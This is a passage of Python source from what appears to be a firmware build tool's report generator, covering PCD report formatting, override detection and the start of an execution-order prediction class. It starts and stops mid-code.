TokenDict = self.UnusedPcds[Token]
for Type in TokenDict:
if TokenDict[Type]:
IsEmpty = False
break
if not IsEmpty:
break
if not IsEmpty:
self.GenerateReportDetail(File, ModulePcdSet, 2)
self.GenerateReportDetail(File, ModulePcdSet)
##
# Generate report for PCD information
#
# This function generates the detailed PCD report for either the whole
# platform or a single module.
#
# @param self The object pointer
# @param File The file object for report
# @param ModulePcdSet Set of all PCDs referenced by module or None for
# platform PCD report
# @param ReportSubType 0 means platform/module PCD report, 1 means Conditional
# directives section report, 2 means Unused Pcds section report
#
def GenerateReportDetail(self, File, ModulePcdSet, ReportSubType = 0):
PcdDict = self.AllPcds
if ReportSubType == 1:
PcdDict = self.ConditionalPcds
elif ReportSubType == 2:
PcdDict = self.UnusedPcds
if not ModulePcdSet:
FileWrite(File, gSectionStart)
if ReportSubType == 1:
FileWrite(File, "Conditional Directives used by the build system")
elif ReportSubType == 2:
FileWrite(File, "PCDs not used by modules or in conditional directives")
else:
FileWrite(File, "Platform Configuration Database Report")
FileWrite(File, " *B - PCD override in the build option")
FileWrite(File, " *P - Platform scoped PCD override in DSC file")
FileWrite(File, " *F - Platform scoped PCD override in FDF file")
if not ReportSubType:
FileWrite(File, " *M - Module scoped PCD override")
FileWrite(File, gSectionSep)
else:
if not ReportSubType and ModulePcdSet:
#
# For module PCD sub-section
#
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_PCD)
FileWrite(File, gSubSectionSep)
AllPcdDict = {}
for Key in PcdDict:
AllPcdDict[Key] = {}
for Type in PcdDict[Key]:
for Pcd in PcdDict[Key][Type]:
AllPcdDict[Key][(Pcd.TokenCName, Type)] = Pcd
for Key in sorted(AllPcdDict):
#
# Group PCDs by their token space GUID C Name
#
First = True
for PcdTokenCName, Type in sorted(AllPcdDict[Key]):
#
# Group PCD by their usage type
#
Pcd = AllPcdDict[Key][(PcdTokenCName, Type)]
TypeName, DecType = gPcdTypeMap.get(Type, ("", Type))
MixedPcdFlag = False
if GlobalData.MixedPcd:
for PcdKey in GlobalData.MixedPcd:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.MixedPcd[PcdKey]:
PcdTokenCName = PcdKey[0]
MixedPcdFlag = True
if MixedPcdFlag and not ModulePcdSet:
continue
#
# Get PCD default value and their override relationship
#
DecDefaultValue = self.DecPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, DecType))
DscDefaultValue = self.DscPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName))
DscDefaultValBak = DscDefaultValue
Field = ''
for (CName, Guid, Field) in self.FdfPcdSet:
if CName == PcdTokenCName and Guid == Key:
DscDefaultValue = self.FdfPcdSet[(CName, Guid, Field)]
break
if DscDefaultValue != DscDefaultValBak:
try:
DscDefaultValue = ValueExpressionEx(DscDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as DscDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" %(DscDefaultValue, Pcd.DatumType))
InfDefaultValue = None
PcdValue = DecDefaultValue
if DscDefaultValue:
PcdValue = DscDefaultValue
# The DefaultValue of a StructurePcd is already the latest; no need to update it.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if ModulePcdSet is not None:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type) not in ModulePcdSet:
continue
InfDefaultValue, PcdValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type]
# The DefaultValue of a StructurePcd is already the latest; no need to update it.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if InfDefaultValue:
try:
InfDefaultValue = ValueExpressionEx(InfDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as InfDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" % (InfDefaultValue, Pcd.DatumType))
if InfDefaultValue == "":
InfDefaultValue = None
BuildOptionMatch = False
if GlobalData.BuildOptionPcd:
for pcd in GlobalData.BuildOptionPcd:
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (pcd[0], pcd[1]):
if pcd[2]:
continue
PcdValue = pcd[3]
# The DefaultValue of a StructurePcd is already the latest; no need to update it.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
BuildOptionMatch = True
break
if First:
if ModulePcdSet is None:
FileWrite(File, "")
FileWrite(File, Key)
First = False
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
if PcdValue.startswith('0') and not PcdValue.lower().startswith('0x') and \
len(PcdValue) > 1 and PcdValue.lstrip('0'):
PcdValue = PcdValue.lstrip('0')
PcdValueNumber = int(PcdValue.strip(), 0)
if DecDefaultValue is None:
DecMatch = True
else:
if DecDefaultValue.startswith('0') and not DecDefaultValue.lower().startswith('0x') and \
len(DecDefaultValue) > 1 and DecDefaultValue.lstrip('0'):
DecDefaultValue = DecDefaultValue.lstrip('0')
DecDefaultValueNumber = int(DecDefaultValue.strip(), 0)
DecMatch = (DecDefaultValueNumber == PcdValueNumber)
if InfDefaultValue is None:
InfMatch = True
else:
if InfDefaultValue.startswith('0') and not InfDefaultValue.lower().startswith('0x') and \
len(InfDefaultValue) > 1 and InfDefaultValue.lstrip('0'):
InfDefaultValue = InfDefaultValue.lstrip('0')
InfDefaultValueNumber = int(InfDefaultValue.strip(), 0)
InfMatch = (InfDefaultValueNumber == PcdValueNumber)
if DscDefaultValue is None:
DscMatch = True
else:
if DscDefaultValue.startswith('0') and not DscDefaultValue.lower().startswith('0x') and \
len(DscDefaultValue) > 1 and DscDefaultValue.lstrip('0'):
DscDefaultValue = DscDefaultValue.lstrip('0')
DscDefaultValueNumber = int(DscDefaultValue.strip(), 0)
DscMatch = (DscDefaultValueNumber == PcdValueNumber)
else:
if DecDefaultValue is None:
DecMatch = True
else:
DecMatch = (DecDefaultValue.strip() == PcdValue.strip())
if InfDefaultValue is None:
InfMatch = True
else:
InfMatch = (InfDefaultValue.strip() == PcdValue.strip())
if DscDefaultValue is None:
DscMatch = True
else:
DscMatch = (DscDefaultValue.strip() == PcdValue.strip())
IsStructure = False
if self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
IsStructure = True
if TypeName in ('DYNVPD', 'DEXVPD'):
SkuInfoList = Pcd.SkuInfoList
Pcd = GlobalData.gStructurePcd[self.Arch][(Pcd.TokenCName, Pcd.TokenSpaceGuidCName)]
Pcd.DatumType = Pcd.StructName
if TypeName in ('DYNVPD', 'DEXVPD'):
Pcd.SkuInfoList = SkuInfoList
if Pcd.PcdValueFromComm or Pcd.PcdFieldValueFromComm:
BuildOptionMatch = True
DecMatch = False
elif Pcd.PcdValueFromFdf or Pcd.PcdFieldValueFromFdf:
DscDefaultValue = True
DscMatch = True
DecMatch = False
elif Pcd.SkuOverrideValues:
DscOverride = False
if Pcd.DefaultFromDSC:
DscOverride = True
else:
DictLen = 0
for item in Pcd.SkuOverrideValues:
DictLen += len(Pcd.SkuOverrideValues[item])
if not DictLen:
DscOverride = False
else:
if not Pcd.SkuInfoList:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
DscOverride = self.ParseStruct(Struct[0])
break
else:
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
OverrideValues = Pcd.SkuOverrideValues[Sku]
DscOverride = self.ParseStruct(OverrideValues[DefaultStore])
if DscOverride:
break
if DscOverride:
break
if DscOverride:
DscDefaultValue = True
DscMatch = True
DecMatch = False
else:
DecMatch = True
else:
DscDefaultValue = True
DscMatch = True
DecMatch = False
#
# Report the PCD item according to its override relationship
#
if Pcd.DatumType == 'BOOLEAN':
if DscDefaultValue:
DscDefaultValue = str(int(DscDefaultValue, 0))
if DecDefaultValue:
DecDefaultValue = str(int(DecDefaultValue, 0))
if InfDefaultValue:
InfDefaultValue = str(int(InfDefaultValue, 0))
if Pcd.DefaultValue:
Pcd.DefaultValue = str(int(Pcd.DefaultValue, 0))
if DecMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, ' ')
elif InfDefaultValue and InfMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
elif BuildOptionMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*B')
else:
if DscDefaultValue and DscMatch:
if (Pcd.TokenCName, Key, Field) in self.FdfPcdSet:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*F')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*P')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
if ModulePcdSet is None:
if IsStructure:
continue
if not TypeName in ('PATCH', 'FLAG', 'FIXED'):
continue
if not BuildOptionMatch:
ModuleOverride = self.ModulePcdOverride.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), {})
for ModulePath in ModuleOverride:
ModuleDefault = ModuleOverride[ModulePath]
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
if ModuleDefault.startswith('0') and not ModuleDefault.lower().startswith('0x') and \
len(ModuleDefault) > 1 and ModuleDefault.lstrip('0'):
ModuleDefault = ModuleDefault.lstrip('0')
ModulePcdDefaultValueNumber = int(ModuleDefault.strip(), 0)
Match = (ModulePcdDefaultValueNumber == PcdValueNumber)
if Pcd.DatumType == 'BOOLEAN':
ModuleDefault = str(ModulePcdDefaultValueNumber)
else:
Match = (ModuleDefault.strip() == PcdValue.strip())
if Match:
continue
IsByteArray, ArrayList = ByteArrayForamt(ModuleDefault.strip())
if IsByteArray:
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
Value = ModuleDefault.strip()
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, Value))
if ModulePcdSet is None:
FileWrite(File, gSectionEnd)
else:
if not ReportSubType and ModulePcdSet:
FileWrite(File, gSubSectionEnd)
def ParseStruct(self, struct):
HasDscOverride = False
if struct:
for _, Values in list(struct.items()):
for Key, value in Values.items():
if value[1] and value[1].endswith('.dsc'):
HasDscOverride = True
break
if HasDscOverride:
break
return HasDscOverride
def PrintPcdDefault(self, File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue):
if not DscMatch and DscDefaultValue is not None:
Value = DscDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', Value))
if not InfMatch and InfDefaultValue is not None:
Value = InfDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', Value))
if not DecMatch and DecDefaultValue is not None:
Value = DecDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', Value))
if IsStructure:
for filedvalues in Pcd.DefaultValues.values():
self.PrintStructureInfo(File, filedvalues)
if DecMatch and IsStructure:
for filedvalues in Pcd.DefaultValues.values():
self.PrintStructureInfo(File, filedvalues)
def PrintPcdValue(self, File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, Flag = ' '):
if not Pcd.SkuInfoList:
Value = Pcd.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith('0') and not Value.lower().startswith('0x') and len(Value) > 1 and Value.lstrip('0'):
Value = Value.lstrip('0')
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
if IsStructure:
FiledOverrideFlag = False
if (Pcd.TokenCName,Pcd.TokenSpaceGuidCName) in GlobalData.gPcdSkuOverrides:
OverrideValues = GlobalData.gPcdSkuOverrides[(Pcd.TokenCName,Pcd.TokenSpaceGuidCName)]
else:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
OverrideFieldStruct = self.OverrideFieldValue(Pcd, Struct[0])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
break
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
FirstPrint = True
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
SkuIdName = SkuInfo.SkuIdName
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
Value = SkuInfo.DefaultStoreDict[DefaultStore]
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
else:
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
FileWrite(File, '%*s: %s: %s' % (self.MaxLen + 4, SkuInfo.VariableGuid, SkuInfo.VariableName, SkuInfo.VariableOffset))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues[Sku]
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[DefaultStore])
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
Value = SkuInfo.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
else:
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
if TypeName in ('DYNVPD', 'DEXVPD'):
FileWrite(File, '%*s' % (self.MaxLen + 4, SkuInfo.VpdOffset))
VPDPcdItem = (Pcd.TokenSpaceGuidCName + '.' + PcdTokenCName, SkuIdName, SkuInfo.VpdOffset, Pcd.MaxDatumSize, SkuInfo.DefaultValue)
if VPDPcdItem not in VPDPcdList:
VPDPcdList.append(VPDPcdItem)
if IsStructure:
FiledOverrideFlag = False
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
Keys = list(OverrideValues.keys())
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
def OverrideFieldValue(self, Pcd, OverrideStruct):
OverrideFieldStruct = collections.OrderedDict()
if OverrideStruct:
for _, Values in OverrideStruct.items():
for Key,value in Values.items():
if value[1] and value[1].endswith('.dsc'):
OverrideFieldStruct[Key] = value
if Pcd.PcdFieldValueFromFdf:
for Key, Values in Pcd.PcdFieldValueFromFdf.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromComm:
for Key, Values in Pcd.PcdFieldValueFromComm.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
return OverrideFieldStruct
def PrintStructureInfo(self, File, Struct):
for Key, Value in sorted(Struct.items(), key=lambda x: x[0]):
if Value[1] and 'build command options' in Value[1]:
FileWrite(File, ' *B %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
elif Value[1] and Value[1].endswith('.fdf'):
FileWrite(File, ' *F %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
else:
FileWrite(File, ' %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
def StrtoHex(self, value):
try:
value = hex(int(value))
return value
except:
if value.startswith("L\"") and value.endswith("\""):
valuelist = []
for ch in value[2:-1]:
valuelist.append(hex(ord(ch)))
valuelist.append('0x00')
return valuelist
elif value.startswith("\"") and value.endswith("\""):
return hex(ord(value[1:-1]))
elif value.startswith("{") and value.endswith("}"):
valuelist = []
if ',' not in value:
return value[1:-1]
for ch in value[1:-1].split(','):
ch = ch.strip()
if ch.startswith('0x') or ch.startswith('0X'):
valuelist.append(ch)
continue
try:
valuelist.append(hex(int(ch.strip())))
except:
pass
return valuelist
else:
return value
def IsStructurePcd(self, PcdToken, PcdTokenSpaceGuid):
if GlobalData.gStructurePcd and (self.Arch in GlobalData.gStructurePcd) and ((PcdToken, PcdTokenSpaceGuid) in GlobalData.gStructurePcd[self.Arch]):
return True
else:
return False
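# A minimal illustrative sketch (not part of the original report code) of the
# dual hex/decimal rendering used above for clean numeric PCD values: a value
# given in hex gains a decimal echo, and a decimal value gains a hex echo.
def _example_format_numeric_pcd(value):
    # Mirror the formatting applied to TAB_PCD_CLEAN_NUMERIC_TYPES values above.
    if value.startswith(('0x', '0X')):
        return '{} ({:d})'.format(value, int(value, 0))
    return "0x{:X} ({})".format(int(value, 0), value)
# _example_format_numeric_pcd('0x20') -> '0x20 (32)'
# _example_format_numeric_pcd('32')   -> '0x20 (32)'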
##
# Reports platform and module Prediction information
#
# This class reports the platform execution order prediction section and
# module load fixed address prediction subsection in the build report file.
#
class PredictionReport(object):
##
# Constructor function for class PredictionReport
#
# This constructor function generates PredictionReport object for the platform.
#
# @param self: The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._MapFileName = os.path.join(Wa.BuildDir, Wa.Name + ".map")
self._MapFileParsed = False
self._EotToolInvoked = False
self._FvDir = Wa.FvDir
self._EotDir = Wa.BuildDir
self._FfsEntryPoint = {}
self._GuidMap = {}
self._SourceList = []
self.FixedMapDict = {}
self.ItemList = []
self.MaxLen = 0
#
# Collect all platform reference source files and GUID C Name
#
for Pa in Wa.AutoGenObjectList:
for Module in Pa.LibraryAutoGenList + Pa.ModuleAutoGenList:
#
# BASE typed modules are EFI agnostic, so we need not scan
# their source code to find PPI/Protocol produce or consume
# information.
#
if Module.ModuleType == SUP_MODULE_BASE:
continue
#
# Add module referenced source files
#
self._SourceList.append(str(Module))
IncludeList = {}
for Source in Module.SourceFileList:
if os.path.splitext(str(Source))[1].lower() == ".c":
self._SourceList.append(" " + str(Source))
FindIncludeFiles(Source.Path, Module.IncludePathList, IncludeList)
for IncludeFile in IncludeList.values():
self._SourceList.append(" " + IncludeFile)
for Guid in Module.PpiList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.PpiList[Guid])
for Guid in Module.ProtocolList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.ProtocolList[Guid])
for Guid in Module.GuidList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.GuidList[Guid])
if Module.Guid and not Module.IsLibrary:
EntryPoint = " ".join(Module.Module.ModuleEntryPointList)
RealEntryPoint = "_ModuleEntryPoint"
self._FfsEntryPoint[Module.Guid.upper()] = (EntryPoint, RealEntryPoint)
#
# Collect platform firmware volume list as the input of EOT.
#
self._FvList = []
if Wa.FdfProfile:
for Fd in Wa.FdfProfile.FdDict:
for FdRegion in Wa.FdfProfile.FdDict[Fd].RegionList:
if FdRegion.RegionType != BINARY_FILE_TYPE_FV:
continue
for FvName in FdRegion.RegionDataList:
if FvName in self._FvList:
continue
self._FvList.append(FvName)
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self._FvList:
continue
self._FvList.append(FvSection.FvName)
except AttributeError:
pass
##
# Parse platform fixed address map files
#
# This function parses the platform final fixed address map file to get
# the database of predicted fixed address for module image base, entry point
# etc.
#
# @param self: The object pointer
#
def _ParseMapFile(self):
if self._MapFileParsed:
return
self._MapFileParsed = True
if os.path.isfile(self._MapFileName):
try:
FileContents = open(self._MapFileName).read()
for Match in gMapFileItemPattern.finditer(FileContents):
AddressType = Match.group(1)
BaseAddress = Match.group(2)
EntryPoint = Match.group(3)
Guid = Match.group(4).upper()
List = self.FixedMapDict.setdefault(Guid, [])
List.append((AddressType, BaseAddress, "*I"))
List.append((AddressType, EntryPoint, "*E"))
except:
EdkLogger.warn(None, "Cannot open file to read", self._MapFileName)
##
    # Invokes EOT tool to get the predicted execution order.
#
# This function invokes EOT tool to calculate the predicted dispatch order
#
# @param self: The object pointer
#
